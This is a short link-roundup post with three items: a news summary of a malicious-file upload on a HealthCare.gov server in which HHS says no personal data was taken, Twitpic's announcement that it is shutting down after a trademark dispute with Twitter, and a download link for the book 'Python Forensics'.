A hacker has acquired access to a portion of HealthCare.gov during late July and succesfully uploaded malicious files. The Wall Street Journal said that, even though the hack took place, no evidence shows that personal information was taken during the breach. HHS officials only discovered the hack a week ago, according to the Journal. “Our review indicates that the server did not contain consumer personal information; data was not transmitted outside the agency, and the website was not specifically targeted,” the Department of Health and Human Services said in a statement. “We have taken measures to further strengthen security.” The attack on the site, where a potential risk of millions of individuals information is accessed, is the most recent in a string of high-profile data breaches. Community Health Systems, one of the primary hospital operators in the united states, is also dealing with a class-action lawsuit after having 4.5 million patient records accessed by sophisticated chinese hackers. Information of the HealthCare.gov breach emerged hours following President Barack Obama appointed former Google executive Megan Smith to be the next U.S. chief technology official. Via HealthCare.gov Breached - Private Info Safe
-
Twitpic will be shutting down September 25th. You will be able to export all your photos and videos. We’ll let everyone know when this feature is live in the next few days. This is an unexpected and hard announcement for us to make and we want to lay out what led us to this decision. A few weeks ago Twitter contacted our legal demanding that we abandon our trademark application or risk losing access to their API. This came as a shock to us since Twitpic has been around since early 2008, and our trademark application has been in the USPTO since 2009. Here is some backstory on the history of our trademark: We originally filed for our trademark in 2009 and our first use in commerce dates back to February 2008 when we launched. We encountered several hurdles and difficulties in getting our trademark approved even though our first use in commerce predated other applications, but we worked through each challenge and in fact had just recently finished the last one. During the “published for opposition” phase of the trademark is when Twitter reached out to our counsel and implied we could be denied access to their API if we did not give up our mark. Unfortunately we do not have the resources to fend off a large company like Twitter to maintain our mark which we believe whole heartedly is rightfully ours. Therefore, we have decided to shut down Twitpic. On a personal note I (@noaheverett) want to thank you for letting us be a part of your life and helping you share your experiences over the past 6 years, it’s truly been an honor. I have learned so much through running Twitpic over the years. Through the many mistakes I’ve made and lessons learned, to the bad days and the great days. Thank you again everyone…I will miss and cherish the days of Twitpic we had together. Via Twitpic is shutting down | Twitpic Blog
-
Python Forensics A Workbench for Inventingand Sharing Digital ForensicTechnology Chet Hosmer Technical Editor: Gary C. Kessler Download http://www.scribd.com/doc/238758497/Python-Forensics